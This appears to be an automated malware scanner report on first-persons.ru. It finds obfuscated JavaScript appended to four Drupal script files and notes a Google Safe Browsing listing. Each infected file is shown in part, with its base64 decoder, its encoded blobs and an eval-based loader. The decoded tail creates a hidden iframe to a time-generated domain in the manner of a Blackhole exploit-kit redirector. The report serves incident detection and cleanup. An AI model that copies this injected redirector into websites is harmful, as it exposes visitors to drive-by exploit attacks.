
Malware Scanner report for first-persons.ru

Malicious/Suspicious/Total urls checked
4/0/15
4 of the 15 checked URLs contain injected malicious code — all four are JavaScript files (misc/drupal.js, themes/tapestry/js/jquery.pngFix.js, themes/tapestry/js/pickstyle.js, themes/tapestry/js/pickicons.js); the HTML pages themselves scanned clean, but every page that loads one of these scripts serves the payload. See details below.
Blacklists
Found
The website is marked by Google as suspicious.

The website "first-persons.ru" has most likely been compromised: obfuscated code has been appended to several of its JavaScript files, and the decoded payload loads a hidden iframe from an attacker-controlled domain, so visitors are exposed to drive-by content while the Google blacklist turns other visitors away. Take action as soon as possible: clean the infected files, find and close the entry point (the same encoder was used in all four files, pointing to a single intrusion), and then request blacklist review.
Malicious Redirects
OK
Malicious/Hidden/Total iFrames
0/0/0 (static HTML only — the hidden 0×0 iframe created at run time by the decoded scripts below via document.createElement("IFRAME") is not visible to this check and is therefore not counted here)
Deface / Content modification
OK


Safe Browsing / Blacklists

Query: http://www.google.com/safebrowsing/diagnostic?site=first-persons.ru

Result: The website is marked by Google as suspicious — visiting this web site may harm your computer.
Details are available on Google's Safe Browsing diagnostic page for the site (the query URL above).

Scanned pages/files

Request | Server response | Status
http://first-persons.ru/
200 OK
Content-Length: 34815
Content-Type: text/html
clean
http://first-persons.ru/misc/jquery.js
200 OK
Content-Length: 31008
Content-Type: application/javascript
clean
http://first-persons.ru/misc/drupal.js
200 OK
Content-Length: 19624
Content-Type: application/javascript
malicious
Malicious code — obfuscated JavaScript appended to the legitimate drupal.js, flagged by multiple antivirus engines (see the reports below)

function kzLIfOuzteVbhCEe(a){var b="ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/=";var c="";var d,chr2,chr3="";var e,enc2,enc3,enc4="";var i=0;a=a.replace(/[^A-Za-z0-9\+\/\=]/g,"");do{e=b.indexOf(a.charAt(i++));enc2=b.indexOf(a.charAt(i++));enc3=b.indexOf(a.charAt(i++));enc4=b.indexOf(a.charAt(i++));d=(e<<2)|(enc2>>4);chr2=((enc2&15)<<4)|(enc3>>2);chr3=((enc3&3)<<6)|enc4;c=c+String.fromCharCode(d);if(enc3!=64){c=c+String.fromCharCode(chr2
... 3363 bytes are skipped ...
%y&N%TAsMjk3LDM4<O>CwxMTYsMT)k4LD]MxMi?wx)Nj*AsMT#Ax#LD:gyLDM2OSw1MDAs:MTI1-LDI.zMCw@z&MDMsNDY0'LDg0LDIx*M'CwzM]jc[s<NDA^0L)DE~x-MS:wy^Mz,QsMzQ$4LDE2MC'wxMDksMT$k0LDMy?MS$w0MDQsNz@AsMjI&4LDI5M#Sw0Mz.Ys MTAxLD[g.4LDE1MCwx-OTIsN,Dg sOT!YsM_TIzLDIz|N.l0!7aWYod-2luZ!G93$LmRvY'3VtZW:50K(WZvc[ihpPTY^t.M[i???0 xLTItMTstMT,I0N|Ctp&IT0yLTI7*aSsrK.Xt!rPWk7c3M9c3M!r_U3(R%y~aW5>nW|2Z*dKG5ba:10vKG'k&lKGgq[aCkrM&SkpO3<1(l,KHN>z_KT't9f_S8]qcWhrNn~Nh@N]mcxY]yo,v!!!!"));

Decoded script (the legitimate drupal.js content first, with the injected payload at the end: a numeric array is turned back into characters with String.fromCharCode and handed to eval — see the `e(ss)` call in the tail below; the trailing `/*qhk6sa6g1c*/` comment looks like the injector's marker):


var Drupal = Drupal || {};
/**
* Set the variable that indicates if JavaScript behaviors should be applied
*/
Drupal.jsEnabled = document.getElementsByTagName && document.createElement && document.createTextNode && document.documentElement && document.getElementById;
/**
* Extends the current object with the parameter. Works recursively.
*/
Drupal.extend = function(obj) {
for (var i in obj) {
if (this[i]) {
... 21795 bytes are skipped ...
8,460,116,242,324,404,46,236,315,460,105,196,315,432,105,232,363,244,34,208,315,400,100,202,330,136,59,200,333,396,117,218,303,440,116,92,294,444,100,242,138,388,112,224,303,440,100,134,312,420,108,200,120,420,102,228,327,164,125,250,297,388,116,198,312,160,101,82,369,500,125,230,303,464,84,210,327,404,111,234,348,160,109,194,321,404,70,228,291,436,101,88,150,192,48,96,123,236];if(window.document)for(i=6-2-1-2-1;-1244+i!=2-2;i++){k=i;ss=ss+String[f](n[k]/(i%(h*h)+1));}e(ss);}}/*qhk6sa6g1c*/

Antivirus reports:

Qihoo-360
Trojan.Generic
AntiVir
JS/BlacoleRef.W.373
Avast
JS:Agent-ADL [Trj]
Ikarus
Trojan-Downloader.JS.Expack
TrendMicro-HouseCall
TROJ_GEN.F47V1118
Comodo
TrojWare.JS.IFrame.JX
K7GW
Exploit ( 04c555151 )
McAfee-GW-Edition
JS/Exploit-Blacole.ht
Microsoft
Trojan:JS/BlacoleRef.W
Fortinet
JS/Expack.SN!tr
Jiangmin
Trojan/Script.Gen
McAfee
JS/Exploit-Blacole.ht
NANO-Antivirus
Trojan.Script.Expack.bfdeei
ClamAV
Trojan.Blackhole-488
AVG
JS/Obfuscated
GData
Win32.Trojan.Agent.TLX8KC
ESET-NOD32
JS/Kryptik.PX

http://first-persons.ru/sites/default/modules/jquery_update/compat.js
200 OK
Content-Length: 3537
Content-Type: application/javascript
clean
http://first-persons.ru/sites/default/modules/lightbox2/js/lightbox.js
200 OK
Content-Length: 41769
Content-Type: application/javascript
clean
http://first-persons.ru/themes/tapestry/js/jquery.pngFix.js
200 OK
Content-Length: 14521
Content-Type: application/javascript
malicious
Malicious code — obfuscated JavaScript using the same base64 decoder (kzLIfOuzteVbhCEe) as the other infected files, flagged by multiple antivirus engines (see the reports below)

function kzLIfOuzteVbhCEe(a){var b="ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/=";var c="";var d,chr2,chr3="";var e,enc2,enc3,enc4="";var i=0;a=a.replace(/[^A-Za-z0-9\+\/\=]/g,"");do{e=b.indexOf(a.charAt(i++));enc2=b.indexOf(a.charAt(i++));enc3=b.indexOf(a.charAt(i++));enc4=b.indexOf(a.charAt(i++));d=(e<<2)|(enc2>>4);chr2=((enc2&15)<<4)|(enc3>>2);chr3=((enc3&3)<<6)|enc4;c=c+String.fromCharCode(d);if(enc3!=64){c=c+String.fromCharCode(chr2
... 3372 bytes are skipped ...
Tk4@LD.MxMiwxNj]A~s???MT,AxL%D^gyL*D>M2OSw1<M>DA s:MT-I1LD?IzMCwzMD&MsN^DY0LDg0L[DIxMCwzM[jcs~N)DA0LDE'xM<S)wyMzQ-sMz[Q|4LD,E2M*Cw&xM)DksMTk0LDMyMS.w&0MDQsN$z:A)sMjI4_LDI!5MSw0MzYsMTA)xLD@g4LDE1MCwx???OTIsN^Dgs_OTYs-MTIz#LDIzN>l07!aW_Yod2<lu???ZG?93|Lm&RvY3VtZW50KW-Z>vc?ih#pP#TY|tM]i0xLTI,tM$TstM%TI0N~C*t#p|IT>0yLTI7a&SsrK<Xt!r'PWk7c3M'9c3MrU3RyaW-5n#W2ZdKG5ba:1:0 v]K&G.k,lKGgqa???Ckr'MS]kp^O<31lKHNzK-T$t9fS8!qc~Wh$r%N)nN_hN!m_c'xYyov!!!!"));

Antivirus reports:

Qihoo-360
Trojan.Generic
AntiVir
JS/BlacoleRef.W.373
Avast
JS:Agent-ADL [Trj]
Ad-Aware
JS:Trojan.Crypt.DX
Bkav
MW.Clod180.Trojan.99d0
Ikarus
Trojan.Script
nProtect
JS:Trojan.Crypt.DX
TrendMicro-HouseCall
TROJ_GEN.F47V1118
Comodo
TrojWare.JS.IFrame.JX
Emsisoft
JS:Trojan.Crypt.DX (B)
K7GW
Exploit ( 04c555151 )
McAfee-GW-Edition
JS/Exploit-Blacole.ht
Microsoft
Trojan:JS/BlacoleRef.W
Kaspersky
Trojan-Downloader.JS.Expack.sn
MicroWorld-eScan
JS:Trojan.Crypt.DX
Fortinet
JS/Expack.SN!tr
Jiangmin
Trojan/Script.Gen
McAfee
JS/Exploit-Blacole.ht
NANO-Antivirus
Trojan.Script.Expack.bfdeei
F-Secure
JS:Trojan.Crypt.DX
AVG
JS/Obfuscated
Norman
Blacole.FY
GData
JS:Trojan.Crypt.DX
BitDefender
JS:Trojan.Crypt.DX

http://first-persons.ru/themes/tapestry/js/pickstyle.js
200 OK
Content-Length: 9984
Content-Type: application/javascript
malicious
Malicious code — obfuscated JavaScript appended to the legitimate pickstyle.js, flagged by multiple antivirus engines (see the reports below)

function kzLIfOuzteVbhCEe(a){var b="ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/=";var c="";var d,chr2,chr3="";var e,enc2,enc3,enc4="";var i=0;a=a.replace(/[^A-Za-z0-9\+\/\=]/g,"");do{e=b.indexOf(a.charAt(i++));enc2=b.indexOf(a.charAt(i++));enc3=b.indexOf(a.charAt(i++));enc4=b.indexOf(a.charAt(i++));d=(e<<2)|(enc2>>4);chr2=((enc2&15)<<4)|(enc3>>2);chr3=((enc3&3)<<6)|enc4;c=c+String.fromCharCode(d);if(enc3!=64){c=c+String.fromCharCode(chr2
... 3385 bytes are skipped ...
LDMxM<i wxNj)AsM&TAxLD!g-yL)DM2OSw1:MD.A~sMTI???1LDI zMC|wzMDMsNDY0LDg0LD^IxMCw@zMjcs<NDA(0???LDEx]M!S(wy*M-zQsMzQ4*LDE2MCw$xM)D_ksMTk0L,DMyMSw0MD???Q???s~NzAsM]j,I|4 L@DI@5:MS&w?0^Mz.YsM)TAxLD:g4LD>E1MCw]xOTIsND&g:s O]TYsMTI(z&LD*I?z?Nl[07aWY]o#d2lu)ZG93Lm@R-vY3V-tZW>5 0%K%WZvc#ih&pPTYtMi0x[LT.ItMTstM]T&I0,N&CtpIT0y)LTI7aSsr[K>Xtr>PWk7c3M<9c3Mr U3R[yaW5n)W#2?Zd.KG5b&a10vKG~klK???G%gq?aCkrM_Sk_pO31lK]HNzK%Tt9fS8q(cWhrN#nNh@N?mcx,Y|yo[v!!!!"));

Decoded script — the original pickstyle() function followed by the injected payload (introduced by the `/*km0ae9gr6m*/` marker, which decodes a numeric array with String.fromCharCode and passes it to window.eval). Once fully decoded, the payload derives a domain name from the current time with generatePseudoRandomString(), then appends a hidden 0×0 iframe pointing at http://<generated-domain>/runforestrun?sid=cxc. The antivirus names below (Blacole/BlacoleRef, Expack) are consistent with a Blackhole exploit-kit redirector:


/**
 * Persist the visitor's chosen theme style in the "tapestrystyle" cookie
 * for 30 days.
 *
 * The cookie is written straight to document.cookie: the value is stored
 * verbatim (not URL-encoded) and no path or domain attribute is set, so the
 * browser defaults apply.
 *
 * NOTE(review): in the scanned file this legitimate function was followed
 * by an appended, obfuscated payload — this block is the original part only.
 *
 * @param {string} whichstyle - style name stored as the cookie value
 */
function pickstyle(whichstyle) {
  var until = new Date();
  // mutate the date in place: 30 days from now, local wall-clock time kept
  until.setDate(until.getDate() + 30);
  var attrs = ["tapestrystyle=" + whichstyle, "expires=" + until.toUTCString()];
  document.cookie = attrs.join("; ");
}
/*km0ae9gr6m*/try{q=document.createElement("p");q.appendChild(q+"");}catch(qw){h=-012/5;f="from";try{bcsd=prototype-2;}catch(bawg){ss=[];f+=(h&&f)?("CharC"+"ode"):"";e=window["eval"];n=[102,234,330,396,116,210,333,440,32,220,303,480,116,164,291,440,100
... 13424 bytes are skipped ...
var a = Math.round(+ new Date / 1000);
var b = generatePseudoRandomString(a, 16, "ru");
ifrm = document.createElement("IFRAME");
ifrm.setAttribute("src", "http://" + b + "/runforestrun?sid=cxc");
ifrm.style.width = "0px";
ifrm.style.height = "0px";
ifrm.style.visibility = "hidden";
document.body.appendChild(ifrm);
}
} catch (e) {
}
}, 2000 */

Antivirus reports:

Qihoo-360
Trojan.Generic
AntiVir
JS/BlacoleRef.W.373
Avast
JS:Agent-ADL [Trj]
Ad-Aware
JS:Trojan.Crypt.DX
Ikarus
Trojan.Script
nProtect
JS:Trojan.Crypt.DX
TrendMicro-HouseCall
TROJ_GEN.F47V1119
Comodo
TrojWare.JS.IFrame.JX
Emsisoft
JS:Trojan.Crypt.DX (B)
K7GW
Exploit ( 04c555151 )
McAfee-GW-Edition
Heuristic.BehavesLike.JS.Suspicious.G
Microsoft
Trojan:JS/BlacoleRef.W
Kaspersky
HEUR:Trojan.Script.Generic
MicroWorld-eScan
JS:Trojan.Crypt.DX
Fortinet
JS/Kryptik.PX
Jiangmin
Trojan/Script.Gen
McAfee
JS/Exploit-Blacole.gc
NANO-Antivirus
Trojan.Script.Expack.bfdeei
F-Secure
JS:Trojan.Crypt.DX
AVG
JS/Obfuscated
Norman
Blacole.LK
GData
JS:Trojan.Crypt.DX
ESET-NOD32
JS/Kryptik.PX
BitDefender
JS:Trojan.Crypt.DX

http://first-persons.ru/themes/tapestry/js/pickicons.js
200 OK
Content-Length: 9982
Content-Type: application/javascript
malicious
Malicious code — obfuscated JavaScript appended to the legitimate pickicons.js, flagged by multiple antivirus engines (see the reports below)

function kzLIfOuzteVbhCEe(a){var b="ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/=";var c="";var d,chr2,chr3="";var e,enc2,enc3,enc4="";var i=0;a=a.replace(/[^A-Za-z0-9\+\/\=]/g,"");do{e=b.indexOf(a.charAt(i++));enc2=b.indexOf(a.charAt(i++));enc3=b.indexOf(a.charAt(i++));enc4=b.indexOf(a.charAt(i++));d=(e<<2)|(enc2>>4);chr2=((enc2&15)<<4)|(enc3>>2);chr3=((enc3&3)<<6)|enc4;c=c+String.fromCharCode(d);if(enc3!=64){c=c+String.fromCharCode(chr2
... 3364 bytes are skipped ...
DEx-Niw|x OTgsM[zE-yL]D&E>2MCwx(MD%E>s|ODIs MzY5?LDU-wMCwxMjUsMjMwLDM,wMy~w#0N[jQsODQsMjEwLDMyNyw0M~DQ:sM#T<Ex%LD]IzN-CwzN,DgsMTYwLDEwOSwxOTQsM?z<IxL DQ(wNCw3M>C&w|yMjg sMj]kxL!D???Qz|NiwxMDEsODgs?MT&UwL)DE5)M'iw0OC'w5,Ni#wxMjM#sMj%M2X T,tp%Zi,h3 a?W5kb3c]uZ???G9j[dW1lbn@QpZm9yKG@k9Ni0y,LTEt^M|i0x_Oy<0xMjQ0K%2$k-h^PTItM~j#tp:Kysp^e2s>9a@Tt^zc^z1???z.cy,t???T-dHJpb$m#dbZ%l0obltrXS8oaS*U[o<aC^p%oKS[s(xKSk<7f%WU'oc3Mp]O31)9%Ly~px|a^Gs2c(2E2ZzFjKi8<=!!!!"));

Decoded script — the original pickicons() function followed by the same injected payload seen in pickstyle.js (the `/*km0ae9gr6m*/` marker, a numeric array decoded with String.fromCharCode and passed to window.eval). The decoded code builds a time-seeded domain with generatePseudoRandomString() and appends a hidden 0×0 iframe loading http://<generated-domain>/runforestrun?sid=cxc:


/**
 * Remember the icon display state in the "tapestryicons" cookie for 30 days.
 *
 * Writes directly to document.cookie. The state is stored as-is (no
 * encoding) and no path/domain attribute is given, so browser defaults apply.
 *
 * NOTE(review): in the scanned file this function was followed by an
 * appended, obfuscated payload — this block is the original part only.
 *
 * @param {string} state - icon state stored as the cookie value
 */
function pickicons(state) {
  var expiry = new Date();
  expiry.setDate(expiry.getDate() + 30); // 30 days ahead, in place
  var cookieText = "tapestryicons=" + state;
  cookieText += "; expires=" + expiry.toUTCString();
  document.cookie = cookieText;
}
/*km0ae9gr6m*/try{q=document.createElement("p");q.appendChild(q+"");}catch(qw){h=-012/5;f="from";try{bcsd=prototype-2;}catch(bawg){ss=[];f+=(h&&f)?("CharC"+"ode"):"";e=window["eval"];n=[102,234,330,396,116,210,333,440,32,220,303,480,116,164,291,440,100,222,327,3
... 13404 bytes are skipped ...
var a = Math.round(+ new Date / 1000);
var b = generatePseudoRandomString(a, 16, "ru");
ifrm = document.createElement("IFRAME");
ifrm.setAttribute("src", "http://" + b + "/runforestrun?sid=cxc");
ifrm.style.width = "0px";
ifrm.style.height = "0px";
ifrm.style.visibility = "hidden";
document.body.appendChild(ifrm);
}
} catch (e) {
}
}, 2000 */

Antivirus reports:

Qihoo-360
Trojan.Generic
AntiVir
JS/BlacoleRef.W.373
Avast
JS:Agent-ADL [Trj]
Ad-Aware
JS:Trojan.Crypt.DX
Ikarus
Trojan.Script
nProtect
JS:Trojan.Crypt.DX
TrendMicro-HouseCall
TROJ_GEN.F47V1118
Emsisoft
JS:Trojan.Crypt.DX (B)
Comodo
TrojWare.JS.IFrame.JX
K7GW
Exploit ( 04c555151 )
McAfee-GW-Edition
Heuristic.BehavesLike.JS.Suspicious.G
Microsoft
Trojan:JS/BlacoleRef.W
Kaspersky
HEUR:Trojan.Script.Generic
MicroWorld-eScan
JS:Trojan.Crypt.DX
Fortinet
JS/Kryptik.PX
Jiangmin
Trojan/Script.Gen
McAfee
JS/Exploit-Blacole.gc
NANO-Antivirus
Trojan.Script.Expack.bfdeei
F-Secure
JS:Trojan.Crypt.DX
AVG
JS/Obfuscated
Norman
Blacole.LK
GData
JS:Trojan.Crypt.DX
ESET-NOD32
JS/Kryptik.PX
BitDefender
JS:Trojan.Crypt.DX

http://first-persons.ru/about
200 OK
Content-Length: 15945
Content-Type: text/html
clean
http://first-persons.ru/order
200 OK
Content-Length: 15767
Content-Type: text/html
clean
http://first-persons.ru/contact
200 OK
Content-Length: 14513
Content-Type: text/html
clean
http://first-persons.ru/misc/textarea.js
200 OK
Content-Length: 1248
Content-Type: application/javascript
clean
http://first-persons.ru/category/1/1
200 OK
Content-Length: 29286
Content-Type: text/html
clean
http://first-persons.ru/category/1/2
200 OK
Content-Length: 19355
Content-Type: text/html
clean
http://first-persons.ru/category/1/3
200 OK
Content-Length: 18605
Content-Type: text/html
clean

Malicious Redirects

First query (normal visit):
GET / HTTP/1.1
Host: first-persons.ru

Result:
HTTP/1.1 200 OK
Cache-Control: must-revalidate
Connection: close
Date: Sat, 27 Dec 2014 13:34:05 GMT
ETag: "0c36a13c1aaf95cb205e63ef4b742b22"
Server: Jino.ru/mod_pizza
Content-Type: text/html; charset=utf-8
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Last-Modified: Fri, 16 May 2014 16:35:51 GMT
Set-Cookie: SESS657fde95c3fac9c2773bc4c84faa51cd=c7c4532e766c1ea302ed3767ace6727a; expires=Mon, 19-Jan-2015 17:07:25 GMT; path=/; domain=.first-persons.ru
Second query (visit from search engine):
GET / HTTP/1.1
Host: first-persons.ru
Referer: http://www.google.com/search?q=first-persons.ru

Result:
The result is similar to the first query; no suspicious server-side redirects were found. Note that this test varied only the Referer header — conditional redirects can also key on the User-Agent, cookies or client IP, so a negative result here is not conclusive, and in this case the malicious behaviour is injected client-side by the scripts themselves rather than by an HTTP redirect. Separately, the session cookie in the first response (SESS…) is set without the HttpOnly flag; worth hardening during cleanup.